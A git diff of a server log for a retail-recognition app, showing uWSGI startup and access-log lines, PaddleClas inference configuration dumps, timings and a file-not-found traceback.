231 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 2/2] 110.248.119.243 () {36 vars in 698 bytes} [Wed Jan 26 13:43:22 2022] GET /picture => generated 179 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 3/3] 110.248.119.243 () {36 vars in 686 bytes} [Wed Jan 26 13:43:24 2022] GET /s => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 4/4] 110.248.119.243 () {36 vars in 700 bytes} [Wed Jan 26 13:43:30 2022] GET /pictures => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 5/5] 110.248.119.243 () {36 vars in 703 bytes} [Wed Jan 26 13:43:37 2022] GET /pictures/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 6/6] 110.248.119.243 () {36 vars in 699 bytes} [Wed Jan 26 13:44:14 2022] GET /images/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 03:48:24 INFO: +2022-01-26 13:45:06 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -1483,75 +756,234 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 03:48:24 INFO: DetPostProcess : -2021-11-03 03:48:24 INFO: DetPreProcess : -2021-11-03 03:48:24 INFO: transform_ops : -2021-11-03 03:48:24 INFO: DetResize : -2021-11-03 03:48:24 INFO: interp : 2 -2021-11-03 03:48:24 INFO: keep_ratio : False -2021-11-03 03:48:24 INFO: target_size : [640, 640] -2021-11-03 03:48:24 INFO: DetNormalizeImage : -2021-11-03 03:48:24 INFO: is_scale : True -2021-11-03 03:48:24 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:48:24 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:48:24 INFO: DetPermute : -2021-11-03 03:48:24 INFO: Global : -2021-11-03 03:48:24 INFO: batch_size : 1 -2021-11-03 03:48:24 INFO: cpu_num_threads : 10 -2021-11-03 03:48:24 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 03:48:24 INFO: enable_benchmark : True -2021-11-03 03:48:24 INFO: enable_mkldnn : True -2021-11-03 03:48:24 INFO: enable_profile : False -2021-11-03 03:48:24 INFO: gpu_mem : 8000 -2021-11-03 03:48:24 INFO: image_shape : [3, 640, 640] -2021-11-03 03:48:24 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 03:48:24 INFO: ir_optim : True -2021-11-03 03:48:24 INFO: labe_list : ['foreground'] -2021-11-03 03:48:24 INFO: max_det_results : 5 -2021-11-03 03:48:24 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 03:48:24 INFO: rec_nms_thresold : 0.05 -2021-11-03 03:48:24 INFO: threshold : 0.2 -2021-11-03 03:48:24 INFO: use_fp16 : False -2021-11-03 03:48:24 INFO: use_gpu : False -2021-11-03 03:48:24 INFO: use_tensorrt : False -2021-11-03 03:48:24 INFO: IndexProcess : -2021-11-03 03:48:24 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 03:48:24 INFO: return_k : 5 -2021-11-03 03:48:24 INFO: score_thres : 0.5 -2021-11-03 03:48:24 INFO: RecPostProcess : None -2021-11-03 03:48:24 INFO: RecPreProcess : -2021-11-03 03:48:24 INFO: transform_ops : -2021-11-03 03:48:24 INFO: ResizeImage : -2021-11-03 03:48:24 INFO: size : 224 -2021-11-03 03:48:24 INFO: NormalizeImage : -2021-11-03 03:48:24 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:48:24 INFO: order : -2021-11-03 03:48:24 INFO: scale : 0.00392157 -2021-11-03 03:48:24 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:48:24 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2309.2424869537354 ms per batch image +2022-01-26 13:45:06 INFO: DetPostProcess : +2022-01-26 13:45:06 INFO: DetPreProcess : +2022-01-26 13:45:06 INFO: transform_ops : +2022-01-26 13:45:06 INFO: DetResize : +2022-01-26 13:45:06 INFO: interp : 2 +2022-01-26 13:45:06 INFO: keep_ratio : False +2022-01-26 13:45:06 INFO: target_size : [640, 640] +2022-01-26 13:45:06 INFO: DetNormalizeImage : +2022-01-26 13:45:06 INFO: is_scale : True +2022-01-26 13:45:06 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 13:45:06 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 13:45:06 INFO: DetPermute : +2022-01-26 13:45:06 INFO: Global : +2022-01-26 13:45:06 INFO: batch_size : 1 +2022-01-26 13:45:06 INFO: cpu_num_threads : 1 +2022-01-26 13:45:06 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-26 13:45:06 INFO: enable_benchmark : True +2022-01-26 13:45:06 INFO: enable_mkldnn : True +2022-01-26 13:45:06 INFO: enable_profile : False +2022-01-26 13:45:06 INFO: gpu_mem : 8000 +2022-01-26 13:45:06 INFO: image_shape : [3, 640, 640] +2022-01-26 13:45:06 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-26 13:45:06 INFO: ir_optim : True +2022-01-26 13:45:06 INFO: labe_list : ['foreground'] +2022-01-26 13:45:06 INFO: max_det_results : 5 +2022-01-26 13:45:06 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 13:45:06 INFO: rec_nms_thresold : 0.05 +2022-01-26 13:45:06 INFO: threshold : 0.2 +2022-01-26 13:45:06 INFO: use_fp16 : False +2022-01-26 13:45:06 INFO: use_gpu : False +2022-01-26 13:45:06 INFO: use_tensorrt : False +2022-01-26 13:45:06 INFO: IndexProcess : +2022-01-26 13:45:06 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 13:45:06 INFO: return_k : 5 +2022-01-26 13:45:06 INFO: score_thres : 0.5 +2022-01-26 13:45:06 INFO: RecPostProcess : None +2022-01-26 13:45:06 INFO: RecPreProcess : +2022-01-26 13:45:06 INFO: transform_ops : +2022-01-26 13:45:06 INFO: ResizeImage : +2022-01-26 13:45:06 INFO: size : 224 +2022-01-26 13:45:06 INFO: NormalizeImage : +2022-01-26 13:45:06 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 13:45:06 INFO: order : +2022-01-26 13:45:06 INFO: scale : 0.00392157 +2022-01-26 13:45:06 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 13:45:06 INFO: ToCHWImage : None +Inference: 422.6183891296387 ms per batch image +[] +Traceback (most recent call last): + File "/root/Smart_container/PaddleClas/deploy/python/predict_client.py", line 157, in + main(config) + File "/root/Smart_container/PaddleClas/deploy/python/predict_client.py", line 142, in main + with open('/home/ubuntu/Smart_container/PaddleClas/dataset/log_client.txt','a+',encoding='utf8') as f: +FileNotFoundError: [Errno 2] No such file or directory: '/home/ubuntu/Smart_container/PaddleClas/dataset/log_client.txt' +234 +[pid: 11941|app: 0|req: 7/7] 49.79.96.123 () {34 vars in 446 bytes} [Wed Jan 26 13:45:05 2022] POST /reference_client/ => generated 145 bytes in 3185 msecs (HTTP/1.1 500) 6 headers in 184 bytes (16 switches on core 0) +[pid: 11941|app: 0|req: 8/8] 110.248.119.243 () {36 vars in 699 bytes} [Wed Jan 26 13:45:56 2022] GET /gallery => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 9/9] 110.248.119.243 () {36 vars in 701 bytes} [Wed Jan 26 13:46:15 2022] GET /gallery/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11941|app: 0|req: 10/10] 110.248.119.243 () {38 vars in 732 bytes} [Wed Jan 26 13:46:17 2022] GET /gallery/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 22:29:36 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x55fee94557d0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x55fee94557d0 pid: 12448 (default app) +mountpoint already configured. skip. +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 12448) +spawned uWSGI worker 1 (pid: 12450, cores: 1) +spawned uWSGI worker 2 (pid: 12451, cores: 1) +spawned uWSGI worker 3 (pid: 12452, cores: 1) +spawned uWSGI worker 4 (pid: 12453, cores: 1) +spawned uWSGI worker 5 (pid: 12454, cores: 1) +spawned uWSGI worker 6 (pid: 12455, cores: 1) +spawned uWSGI worker 7 (pid: 12456, cores: 1) +spawned uWSGI worker 8 (pid: 12457, cores: 1) +spawned uWSGI worker 9 (pid: 12458, cores: 1) +spawned uWSGI worker 10 (pid: 12459, cores: 1) +spawned uWSGI http 1 (pid: 12460) +[pid: 12459|app: 0|req: 1/1] 110.248.119.243 () {38 vars in 709 bytes} [Wed Jan 26 14:36:23 2022] GET / => generated 179 bytes in 232 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 2/2] 2.57.121.59 () {34 vars in 400 bytes} [Wed Jan 26 14:36:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 3/3] 110.248.119.243 () {40 vars in 688 bytes} [Wed Jan 26 14:36:31 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 4/4] 94.25.170.211 () {32 vars in 464 bytes} [Wed Jan 26 15:00:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 5/5] 101.89.239.238 () {32 vars in 499 bytes} [Wed Jan 26 15:22:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 6/6] 47.102.129.27 () {34 vars in 502 bytes} [Wed Jan 26 15:35:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 7/7] 176.97.210.244 () {28 vars in 311 bytes} [Wed Jan 26 16:00:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 8/8] 176.97.210.244 () {40 vars in 663 bytes} [Wed Jan 26 16:00:23 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 9/9] 49.79.96.123 () {36 vars in 799 bytes} [Wed Jan 26 16:06:28 2022] POST /search/ => generated 20175 bytes in 13 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 10/10] 83.97.20.34 () {26 vars in 287 bytes} [Wed Jan 26 16:22:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 11/11] 107.189.29.181 () {28 vars in 311 bytes} [Wed Jan 26 16:30:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12458|app: 0|req: 1/12] 107.189.29.181 () {40 vars in 672 bytes} [Wed Jan 26 16:30:57 2022] POST /HNAP1/ => generated 179 bytes in 240 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 12459|app: 0|req: 12/13] 104.206.128.66 () {30 vars in 373 bytes} [Wed Jan 26 16:31:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +2022-01-26 16:38:20 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-26 16:38:20 INFO: Global : +2022-01-26 16:38:20 INFO: batch_size : 32 +2022-01-26 16:38:20 INFO: cpu_num_threads : 1 +2022-01-26 16:38:20 INFO: enable_benchmark : True +2022-01-26 16:38:20 INFO: enable_mkldnn : True +2022-01-26 16:38:20 INFO: enable_profile : False +2022-01-26 16:38:20 INFO: gpu_mem : 8000 +2022-01-26 16:38:20 INFO: ir_optim : True +2022-01-26 16:38:20 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 16:38:20 INFO: use_fp16 : False +2022-01-26 16:38:20 INFO: use_gpu : False +2022-01-26 16:38:20 INFO: use_tensorrt : False +2022-01-26 16:38:20 INFO: IndexProcess : +2022-01-26 16:38:20 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-01-26 16:38:20 INFO: delimiter : +2022-01-26 16:38:20 INFO: dist_type : IP +2022-01-26 16:38:20 INFO: embedding_size : 512 +2022-01-26 16:38:20 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-01-26 16:38:20 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 16:38:20 INFO: index_method : HNSW32 +2022-01-26 16:38:20 INFO: index_operation : new +2022-01-26 16:38:20 INFO: RecPostProcess : None +2022-01-26 16:38:20 INFO: RecPreProcess : +2022-01-26 16:38:20 INFO: transform_ops : +2022-01-26 16:38:20 INFO: ResizeImage : +2022-01-26 16:38:20 INFO: size : 224 +2022-01-26 16:38:20 INFO: NormalizeImage : +2022-01-26 16:38:20 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:38:20 INFO: order : +2022-01-26 16:38:20 INFO: scale : 0.00392157 +2022-01-26 16:38:20 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:38:20 INFO: ToCHWImage : None + 0%| | 0/190 [00:00 generated 34 bytes in 6444 msecs (HTTP/1.1 200) 5 headers in 157 bytes (19 switches on core 0) +2022-01-26 16:38:37 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-26 16:38:37 INFO: DetPostProcess : +2022-01-26 16:38:37 INFO: DetPreProcess : +2022-01-26 16:38:37 INFO: transform_ops : +2022-01-26 16:38:37 INFO: DetResize : +2022-01-26 16:38:37 INFO: interp : 2 +2022-01-26 16:38:37 INFO: keep_ratio : False +2022-01-26 16:38:37 INFO: target_size : [640, 640] +2022-01-26 16:38:37 INFO: DetNormalizeImage : +2022-01-26 16:38:37 INFO: is_scale : True +2022-01-26 16:38:37 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:38:37 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:38:37 INFO: DetPermute : +2022-01-26 16:38:37 INFO: Global : +2022-01-26 16:38:37 INFO: batch_size : 1 +2022-01-26 16:38:37 INFO: cpu_num_threads : 1 +2022-01-26 16:38:37 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-26 16:38:37 INFO: enable_benchmark : True +2022-01-26 16:38:37 INFO: enable_mkldnn : True +2022-01-26 16:38:37 INFO: enable_profile : False +2022-01-26 16:38:37 INFO: gpu_mem : 8000 +2022-01-26 16:38:37 INFO: image_shape : [3, 640, 640] +2022-01-26 16:38:37 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-01-26 16:38:37 INFO: ir_optim : True +2022-01-26 16:38:37 INFO: labe_list : ['foreground'] +2022-01-26 16:38:37 INFO: max_det_results : 5 +2022-01-26 16:38:37 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 16:38:37 INFO: rec_nms_thresold : 0.05 +2022-01-26 16:38:37 INFO: threshold : 0.2 +2022-01-26 16:38:37 INFO: use_fp16 : False +2022-01-26 16:38:37 INFO: use_gpu : False +2022-01-26 16:38:37 INFO: use_tensorrt : False +2022-01-26 16:38:37 INFO: IndexProcess : +2022-01-26 16:38:37 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 16:38:37 INFO: return_k : 5 +2022-01-26 16:38:37 INFO: score_thres : 0.5 +2022-01-26 16:38:37 INFO: RecPostProcess : None +2022-01-26 16:38:37 INFO: RecPreProcess : +2022-01-26 16:38:37 INFO: transform_ops : +2022-01-26 16:38:37 INFO: ResizeImage : +2022-01-26 16:38:37 INFO: size : 224 +2022-01-26 16:38:37 INFO: NormalizeImage : +2022-01-26 16:38:37 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:38:37 INFO: order : +2022-01-26 16:38:37 INFO: scale : 0.00392157 +2022-01-26 16:38:37 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:38:37 INFO: ToCHWImage : None +Inference: 373.3198642730713 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 3/6] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 03:48:23 2021] POST /reference_client/ => generated 98 bytes in 6275 msecs (HTTP/1.1 200) 5 headers in 157 bytes (12 switches on core 0) -req -2021-11-03 03:49:17 INFO: +[pid: 12457|app: 0|req: 1/15] 49.79.96.123 () {36 vars in 810 bytes} [Wed Jan 26 16:38:36 2022] POST /reference/ => generated 98 bytes in 3135 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-01-26 16:38:58 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -1561,75 +993,58 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 03:49:17 INFO: DetPostProcess : -2021-11-03 03:49:17 INFO: DetPreProcess : -2021-11-03 03:49:17 INFO: transform_ops : -2021-11-03 03:49:17 INFO: DetResize : -2021-11-03 03:49:17 INFO: interp : 2 -2021-11-03 03:49:17 INFO: keep_ratio : False -2021-11-03 03:49:17 INFO: target_size : [640, 640] -2021-11-03 03:49:17 INFO: DetNormalizeImage : -2021-11-03 03:49:17 INFO: is_scale : True -2021-11-03 03:49:17 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:49:17 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:49:17 INFO: DetPermute : -2021-11-03 03:49:17 INFO: Global : -2021-11-03 03:49:17 INFO: batch_size : 1 -2021-11-03 03:49:17 INFO: cpu_num_threads : 10 -2021-11-03 03:49:17 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 03:49:17 INFO: enable_benchmark : True -2021-11-03 03:49:17 INFO: enable_mkldnn : True -2021-11-03 03:49:17 INFO: enable_profile : False -2021-11-03 03:49:17 INFO: gpu_mem : 8000 -2021-11-03 03:49:17 INFO: image_shape : [3, 640, 640] -2021-11-03 03:49:17 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 03:49:17 INFO: ir_optim : True -2021-11-03 03:49:17 INFO: labe_list : ['foreground'] -2021-11-03 03:49:17 INFO: max_det_results : 5 -2021-11-03 03:49:17 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 03:49:17 INFO: rec_nms_thresold : 0.05 -2021-11-03 03:49:17 INFO: threshold : 0.2 -2021-11-03 03:49:17 INFO: use_fp16 : False -2021-11-03 03:49:17 INFO: use_gpu : False -2021-11-03 03:49:17 INFO: use_tensorrt : False -2021-11-03 03:49:17 INFO: IndexProcess : -2021-11-03 03:49:17 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 03:49:17 INFO: return_k : 5 -2021-11-03 03:49:17 INFO: score_thres : 0.5 -2021-11-03 03:49:17 INFO: RecPostProcess : None -2021-11-03 03:49:17 INFO: RecPreProcess : -2021-11-03 03:49:17 INFO: transform_ops : -2021-11-03 03:49:17 INFO: ResizeImage : -2021-11-03 03:49:17 INFO: size : 224 -2021-11-03 03:49:17 INFO: NormalizeImage : -2021-11-03 03:49:17 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:49:17 INFO: order : -2021-11-03 03:49:17 INFO: scale : 0.00392157 -2021-11-03 03:49:17 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:49:17 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2494.0578937530518 ms per batch image +2022-01-26 16:38:58 INFO: DetPostProcess : +2022-01-26 16:38:58 INFO: DetPreProcess : +2022-01-26 16:38:58 INFO: transform_ops : +2022-01-26 16:38:58 INFO: DetResize : +2022-01-26 16:38:58 INFO: interp : 2 +2022-01-26 16:38:58 INFO: keep_ratio : False +2022-01-26 16:38:58 INFO: target_size : [640, 640] +2022-01-26 16:38:58 INFO: DetNormalizeImage : +2022-01-26 16:38:58 INFO: is_scale : True +2022-01-26 16:38:58 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:38:58 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:38:58 INFO: DetPermute : +2022-01-26 16:38:58 INFO: Global : +2022-01-26 16:38:58 INFO: batch_size : 1 +2022-01-26 16:38:58 INFO: cpu_num_threads : 1 +2022-01-26 16:38:58 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-26 16:38:58 INFO: enable_benchmark : True +2022-01-26 16:38:58 INFO: enable_mkldnn : True +2022-01-26 16:38:58 INFO: enable_profile : False +2022-01-26 16:38:58 INFO: gpu_mem : 8000 +2022-01-26 16:38:58 INFO: image_shape : [3, 640, 640] +2022-01-26 16:38:58 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-01-26 16:38:58 INFO: ir_optim : True +2022-01-26 16:38:58 INFO: labe_list : ['foreground'] +2022-01-26 16:38:58 INFO: max_det_results : 5 +2022-01-26 16:38:58 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 16:38:58 INFO: rec_nms_thresold : 0.05 +2022-01-26 16:38:58 INFO: threshold : 0.2 +2022-01-26 16:38:58 INFO: use_fp16 : False +2022-01-26 16:38:58 INFO: use_gpu : False +2022-01-26 16:38:58 INFO: use_tensorrt : False +2022-01-26 16:38:58 INFO: IndexProcess : +2022-01-26 16:38:58 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 16:38:58 INFO: return_k : 5 +2022-01-26 16:38:58 INFO: score_thres : 0.5 +2022-01-26 16:38:58 INFO: RecPostProcess : None +2022-01-26 16:38:58 INFO: RecPreProcess : +2022-01-26 16:38:58 INFO: transform_ops : +2022-01-26 16:38:58 INFO: ResizeImage : +2022-01-26 16:38:58 INFO: size : 224 +2022-01-26 16:38:58 INFO: NormalizeImage : +2022-01-26 16:38:58 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:38:58 INFO: order : +2022-01-26 16:38:58 INFO: scale : 0.00392157 +2022-01-26 16:38:58 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:38:58 INFO: ToCHWImage : None +Inference: 377.3174285888672 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32766|app: 0|req: 3/7] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 03:49:16 2021] POST /reference_client/ => generated 98 bytes in 6748 msecs (HTTP/1.1 200) 5 headers in 157 bytes (9 switches on core 0) -req -2021-11-03 03:50:09 INFO: +[pid: 12459|app: 0|req: 14/16] 49.79.96.123 () {36 vars in 810 bytes} [Wed Jan 26 16:38:57 2022] POST /reference/ => generated 98 bytes in 3023 msecs (HTTP/1.1 200) 5 headers in 157 bytes (33 switches on core 0) +2022-01-26 16:39:11 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -1639,76 +1054,107 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 03:50:09 INFO: DetPostProcess : -2021-11-03 03:50:09 INFO: DetPreProcess : -2021-11-03 03:50:09 INFO: transform_ops : -2021-11-03 03:50:09 INFO: DetResize : -2021-11-03 03:50:09 INFO: interp : 2 -2021-11-03 03:50:09 INFO: keep_ratio : False -2021-11-03 03:50:09 INFO: target_size : [640, 640] -2021-11-03 03:50:09 INFO: DetNormalizeImage : -2021-11-03 03:50:09 INFO: is_scale : True -2021-11-03 03:50:09 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:50:09 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:50:09 INFO: DetPermute : -2021-11-03 03:50:09 INFO: Global : -2021-11-03 03:50:09 INFO: batch_size : 1 -2021-11-03 03:50:09 INFO: cpu_num_threads : 10 -2021-11-03 03:50:09 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 03:50:09 INFO: enable_benchmark : True -2021-11-03 03:50:09 INFO: enable_mkldnn : True -2021-11-03 03:50:09 INFO: enable_profile : False -2021-11-03 03:50:09 INFO: gpu_mem : 8000 -2021-11-03 03:50:09 INFO: image_shape : [3, 640, 640] -2021-11-03 03:50:09 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 03:50:09 INFO: ir_optim : True -2021-11-03 03:50:09 INFO: labe_list : ['foreground'] -2021-11-03 03:50:09 INFO: max_det_results : 5 